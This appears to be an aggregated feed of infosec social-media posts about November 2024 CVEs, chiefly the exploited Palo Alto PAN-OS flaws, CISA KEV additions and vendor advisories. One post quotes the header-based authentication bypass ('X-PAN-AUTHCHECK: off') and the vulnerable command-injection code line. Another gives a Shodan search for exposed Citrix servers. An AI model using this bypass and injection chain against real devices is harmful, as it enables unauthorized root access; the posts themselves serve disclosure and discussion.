##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
###PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ #cybersecurity #Infosec
##r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
###PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ #cybersecurity #Infosec
##r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!
##Favorite quote from WatchTowr's blog about PAN-OS vuln:
##I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.
Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.
A few things stand out:
First, sorry @cR0w, no #directorytraversalmemes for you:
We simply… supply the
off
value to theX-PAN-AUTHCHECK
HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.
That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING
return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");
So obviously if that $username
has shell metacharacters, you have yourself a nice command injection.
And guess what user the service runs as?
##WatchTower: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ #cybersecurity #infosec #PaloAlto
##If you missed this, #PaloAlto has patched a Firewall Zero-Day Exploited in Operation Lunar Peek https://www.securityweek.com/palo-alto-patches-firewall-zero-day-exploited-in-operation-lunar-peek/ @SecurityWeek @ekovacs
More:
Palo Alto Unit 42 posted this yesterday about Lunar Peek activity related to CVE-2024-0012: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
##@christopherkunz Palo Alto keeps on giving.
##Weeeeeee
I don’t know why Palo-Alto changed the CVEs at the last minute to remove reference to RCE. It’s remote code execution. https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 - watchTowr Labs https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
##CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog
: CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).
🔗️ [Cyble] https://link.is.it/so5jib
##@catc0n I noticed the disparity between the CVE-2024-9474 advisory description "privilege escalation vulnerability" and CISA's KEV Catalog name "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"
Palo Alto Networks discarded the verbiage from Thursday "unauthenticated remote command execution vulnerability" and divided the unauth RCE into 2 separate vulnerabilities, while stating that one would be allow for the other.
So authentication bypass to admin (CVE-2024-0012), then authenticated privesc from admin to root (CVE-2024-9474).
Unit 42 skipped talking about CVE-2024-9474.
The CVSSv4 vector is CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/AU:N/R:U/V:C/RE:H/U:Red I think the real takeaway is that only Integrity is impacted. Everything else appears to be the consequence of having root privileges on a firewall
##@shadowserver IOCs provided by Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
CVEs were added to CISA's KEV Catalog: https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog
###CISA has updated the KEV catalogue:
CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1212
- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-0012
- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-9474 @cisacyber #cybersecurity #infosec #PaloAlto
##CVE ID: CVE-2024-9474
Vendor: Palo Alto Networks
Product: PAN-OS
Date Added: 2024-11-18
Vulnerability: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
Notes: https://security.paloaltonetworks.com/CVE-2024-9474 ; https://nvd.nist.gov/vuln/detail/CVE-2024-9474
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-9474
#PaloAlto has updated its security advisories: https://security.paloaltonetworks.com/
- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface https://security.paloaltonetworks.com/CVE-2024-0012
- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface @paloaltontwks #cybersecurity #infosec
##Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/ #PaloAltoNetworks #enterprise #Don'tmiss #Hotstuff #firewall #0-day #News #CVE
##Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days.
CVE-2024-0012 is the (previously unspecified) unauthenticated remote command execution zero-day that the company started warning about ten days ago.
https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/
##@screaminggoat "Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly." 🤔
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
##Palo Alto Unit42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ @unit42_intel #cybersecurity #infosec
##@neurovagrant start your Monday off with exploited zero-days:
##@therecord_media @jwarminsky @jgreig can this news article be updated to include the two CVE IDs?: CVE-2024-0012 and CVE-2024-9474
##updated 2024-11-19T15:32:55
1 posts
1 repos
Mozilla Foundation security advisories:
No mention of exploitation
#mozilla #thunderbird #vulnerability #CVE #infosec #cybersecurity
##updated 2024-11-19T03:40:15.550000
1 posts
Some fairly interesting stuff for this #PatchTuesday!
Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.
https://www.zerodayinitiative.com/blog/2024/11/12/the-november-2024-security-update-review
##updated 2024-11-18T23:41:15
3 posts
1 repos
Finally got to publish the CVE for a "forever-day" path traversal in the .NET library DotNetZip affecting all releases since 2018. Enjoy, the PoC is in the patch! :blobcatsuit: #CVE_2024_48510
##Finally got to publish the CVE for a "forever-day" path traversal in the .NET library DotNetZip affecting all releases since 2018. Enjoy, the PoC is in the patch! :blobcatsuit: #CVE_2024_48510
##updated 2024-11-18T22:20:32.157000
3 posts
@winterknight1337 @Viss https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43639
##@screaminggoat https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43639 👀
##CVE-2024-43639 looks interesting. Critical RCE in Kerberos? Nice.
##updated 2024-11-18T20:08:45
4 posts
CVE Alert: CVE-2023-1419 - https://www.redpacketsecurity.com/cve_alert_cve-2023-1419/
##CVE Alert: CVE-2023-1419 - https://www.redpacketsecurity.com/cve_alert_cve-2023-1419/
##CVE Alert: CVE-2023-1419 - https://www.redpacketsecurity.com/cve_alert_cve-2023-1419/
##CVE Alert: CVE-2023-1419 - https://www.redpacketsecurity.com/cve_alert_cve-2023-1419/
##updated 2024-11-18T20:08:31
4 posts
CVE Alert: CVE-2023-4639 - https://www.redpacketsecurity.com/cve_alert_cve-2023-4639/
##CVE Alert: CVE-2023-4639 - https://www.redpacketsecurity.com/cve_alert_cve-2023-4639/
##CVE Alert: CVE-2023-4639 - https://www.redpacketsecurity.com/cve_alert_cve-2023-4639/
##CVE Alert: CVE-2023-4639 - https://www.redpacketsecurity.com/cve_alert_cve-2023-4639/
##updated 2024-11-18T20:08:26
4 posts
CVE Alert: CVE-2023-6110 - https://www.redpacketsecurity.com/cve_alert_cve-2023-6110/
##CVE Alert: CVE-2023-6110 - https://www.redpacketsecurity.com/cve_alert_cve-2023-6110/
##CVE Alert: CVE-2023-6110 - https://www.redpacketsecurity.com/cve_alert_cve-2023-6110/
##CVE Alert: CVE-2023-6110 - https://www.redpacketsecurity.com/cve_alert_cve-2023-6110/
##updated 2024-11-18T18:32:00
1 posts
1 repos
💡AnyDesk IP Leak Vulnerability CVE-2024-52940
https://darkwebinformer.com/anydesk-ip-leak-vulnerability-cve-2024-52940/
##updated 2024-11-18T17:28:40
4 posts
CVE Alert: CVE-2023-0657 - https://www.redpacketsecurity.com/cve_alert_cve-2023-0657/
##CVE Alert: CVE-2023-0657 - https://www.redpacketsecurity.com/cve_alert_cve-2023-0657/
##CVE Alert: CVE-2023-0657 - https://www.redpacketsecurity.com/cve_alert_cve-2023-0657/
##CVE Alert: CVE-2023-0657 - https://www.redpacketsecurity.com/cve_alert_cve-2023-0657/
##updated 2024-11-17T15:30:52
4 posts
1 repos
CVE Alert: CVE-2023-43091 - https://www.redpacketsecurity.com/cve_alert_cve-2023-43091/
##CVE Alert: CVE-2023-43091 - https://www.redpacketsecurity.com/cve_alert_cve-2023-43091/
##CVE Alert: CVE-2023-43091 - https://www.redpacketsecurity.com/cve_alert_cve-2023-43091/
##CVE Alert: CVE-2023-43091 - https://www.redpacketsecurity.com/cve_alert_cve-2023-43091/
##updated 2024-11-17T12:30:36
4 posts
CVE Alert: CVE-2020-25720 - https://www.redpacketsecurity.com/cve_alert_cve-2020-25720/
##CVE Alert: CVE-2020-25720 - https://www.redpacketsecurity.com/cve_alert_cve-2020-25720/
##CVE Alert: CVE-2020-25720 - https://www.redpacketsecurity.com/cve_alert_cve-2020-25720/
##CVE Alert: CVE-2020-25720 - https://www.redpacketsecurity.com/cve_alert_cve-2020-25720/
##updated 2024-11-15T21:30:53
2 posts
1 repos
This was added to #Microsoft's advisories yesterday:
Security vulnerability for Arc VMs running on #Azure Stack HCI, version 23H2 https://github.com/Azure/AzureStackHCI-Supportability/blob/main/TSG/ArcVMs/security-vulnerability-cve-2024-49060.md #cybersecurity #Infosec
##Microsoft Security Response Center (MSRC): CVE-2024-49060
Leave it to Microsoft to drop an out-of-band vulnerability outside of Patch Tuesday. CVE-2024-49060 (8.8 high) Azure Stack HCI Elevation of Privilege Vulnerability. Not Exploited, not Publicly disclosed, Exploitation More Likely. Read the FAQ for explanation of AV:L and S:C.
#microsoft #vulnerability #cve #infosec #cybersecurity #azure
##updated 2024-11-15T15:31:04
1 posts
1 repos
🚨CVE-2024-50986: DLL Hijacking Exploit for Clementine
https://darkwebinformer.com/cve-20224-50986-dll-hijacking-exploit-for-clementine/
##updated 2024-11-15T14:39:34.863000
10 posts
1 repos
CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity
##CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog
CISA has added CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical vulnerabilities in Palo Alto Networks Expedition are actively...
🔗️ [Cyble] https://link.is.it/qfqgxi
##Palo Alto Networks firewalls, Expedition under attack (CVE-2024-9463, CVE-2024-9465) https://www.helpnetsecurity.com/2024/11/15/cve-2024-9463-cve-2024-9465/ #configurationmanagement #PaloAltoNetworks #Horizon3.ai #enterprise #Don'tmiss #Hotstuff #firewall #Censys #News #CISA
##Another SQL injection vuln. Not the last. Why? Well, part of the prob is we don't teach secure coding in most programing curriculums and companies hiring programmers don't require that programmers have secure coding skills. Time to maybe do this things?
##CVE ID: CVE-2024-9465
Vendor: Palo Alto Networks
Product: Expedition
Date Added: 2024-11-14
Vulnerability: Palo Alto Networks Expedition SQL Injection Vulnerability
Notes: https://security.paloaltonetworks.com/PAN-SA-2024-0010 ; https://nvd.nist.gov/vuln/detail/CVE-2024-9465
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-9465
updated 2024-11-15T02:00:01.687000
9 posts
1 repos
CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog https://cyble.com/blog/cisa-adds-two-critical-palo-alto-networks-vulnerabilities-to-known-exploited-catalog/ #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA
##CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity
##CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity
##CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog
CISA has added CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical vulnerabilities in Palo Alto Networks Expedition are actively...
🔗️ [Cyble] https://link.is.it/qfqgxi
##Palo Alto Networks firewalls, Expedition under attack (CVE-2024-9463, CVE-2024-9465) https://www.helpnetsecurity.com/2024/11/15/cve-2024-9463-cve-2024-9465/ #configurationmanagement #PaloAltoNetworks #Horizon3.ai #enterprise #Don'tmiss #Hotstuff #firewall #Censys #News #CISA
##CVE ID: CVE-2024-9463
Vendor: Palo Alto Networks
Product: Expedition
Date Added: 2024-11-14
Vulnerability: Palo Alto Networks Expedition OS Command Injection Vulnerability
Notes: https://security.paloaltonetworks.com/PAN-SA-2024-0010 ; https://nvd.nist.gov/vuln/detail/CVE-2024-9463
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-9463
updated 2024-11-14T22:45:14
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T22:45:13
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T21:32:11
1 posts
1 repos
Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.
#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday
##updated 2024-11-14T18:30:34
3 posts
1 repos
The second Citrix security advisory Citrix Session Recording Security Bulletin for CVE-2024-8068 and CVE-2024-8069 appears to be the same vulnerabilities mentioned in yesterday's watchTowr blog post Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown), based on the credits/acknowledgement to watchTowr, description of vulnerabilities, and the affected products. At the time of this toot, watchTowr has not updated their blog post to include the CVE IDs.
#Citrix #vulnerability #virtualappsanddesktops #cve #infosec #cybersecurity #watchtowr
##If you present Citrix StoreFront aka Citrix StoreWeb directly to the internet and enabled session recording, you will want to drop everything and install patches for CVE-2024-8068 and CVE-2024-8069. People are already scanning for it (no signs of exploitation).
It’s a niche scenario for direct internet access.
Vendor advisory: https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US
Technical write up: https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
Shodan dork: https://beta.shodan.io/search?query=html%3A%22StoreWeb%2F%22
Citrix have used terms like “limited RCE” and “intranet” 🤨
##Happy #PatchTuesday from Citrix:
Please see the advisories for the prerequisites for each vulnerability.
#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity
##updated 2024-11-14T18:30:33
1 posts
A new vulnerability on IPv6 parsing in linux https://nvd.nist.gov/vuln/detail/CVE-2024-50252
##updated 2024-11-14T15:42:42
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T15:41:49
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T15:37:53
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T15:35:55
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-11-14T15:32:22
2 posts
1 repos
Reproducing CVE-2024-10979: A Step-by-Step Guide: https://redrays.io/blog/reproducing-cve-2024-10979-a-step-by-step-guide/
##Reproducing CVE-2024-10979: A Step-by-Step Guide: https://redrays.io/blog/reproducing-cve-2024-10979-a-step-by-step-guide/
##updated 2024-11-14T15:32:22
1 posts
1 repos
GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T15:32:16
1 posts
GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T12:31:09
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:08
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:08
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:02
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:02
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:02
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:02
1 posts
1 repos
GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T12:31:02
1 posts
GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7
No mention of exploitation.
#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-14T12:31:01
1 posts
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T12:31:01
1 posts
1 repos
Happy #PatchTuesday on a Wednesday from Palo Alto Networks:
"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."
##updated 2024-11-14T00:31:11
1 posts
Happy #PatchTuesday from Citrix:
Please see the advisories for the prerequisites for each vulnerability.
#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity
##updated 2024-11-13T21:31:39
1 posts
2 repos
We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:
- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093
Hit up viz.greynoise.io for deets + real/useful/timely blocklists.
CVE-2024-43093 is client-side, hence no coverage.
##updated 2024-11-13T20:35:12.293000
1 posts
Happy #PatchTuesday from Citrix:
Please see the advisories for the prerequisites for each vulnerability.
#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity
##updated 2024-11-13T18:33:06
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:33:05
2 posts
1 repos
Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.
#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday
##Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:33:05
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:33:05
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:31:59
2 posts
1 repos
Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.
#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday
##Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) 131.0.6778.69/.70( Windows, Mac) bring 12 security fixes, 8 are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T18:31:59
3 posts
1 repos
The second Citrix security advisory Citrix Session Recording Security Bulletin for CVE-2024-8068 and CVE-2024-8069 appears to be the same vulnerabilities mentioned in yesterday's watchTowr blog post Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown), based on the credits/acknowledgement to watchTowr, description of vulnerabilities, and the affected products. At the time of this toot, watchTowr has not updated their blog post to include the CVE IDs.
#Citrix #vulnerability #virtualappsanddesktops #cve #infosec #cybersecurity #watchtowr
##If you present Citrix StoreFront aka Citrix StoreWeb directly to the internet and enabled session recording, you will want to drop everything and install patches for CVE-2024-8068 and CVE-2024-8069. People are already scanning for it (no signs of exploitation).
It’s a niche scenario for direct internet access.
Vendor advisory: https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US
Technical write up: https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
Shodan dork: https://beta.shodan.io/search?query=html%3A%22StoreWeb%2F%22
Citrix have used terms like “limited RCE” and “intranet” 🤨
##Happy #PatchTuesday from Citrix:
Please see the advisories for the prerequisites for each vulnerability.
#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity
##updated 2024-11-13T18:31:52
2 posts
1 repos
CVE ID: CVE-2014-2120
Vendor: Cisco
Product: Adaptive Security Appliance (ASA)
Date Added: 2024-11-12
Vulnerability: Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
Notes: https://web.archive.org/web/20140403043510/http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-2120 ; https://nvd.nist.gov/vuln/detail/CVE-2014-2120
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2014-2120
CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-13T17:39:36.637000
2 posts
1 repos
CVE ID: CVE-2021-26086
Vendor: Atlassian
Product: Jira Server and Data Center
Date Added: 2024-11-12
Vulnerability: Atlassian Jira Server and Data Center Path Traversal Vulnerability
Notes: https://jira.atlassian.com/browse/JRASERVER-72695 ; https://nvd.nist.gov/vuln/detail/CVE-2021-26086
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2021-26086
CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-13T12:32:16
2 posts
1 repos
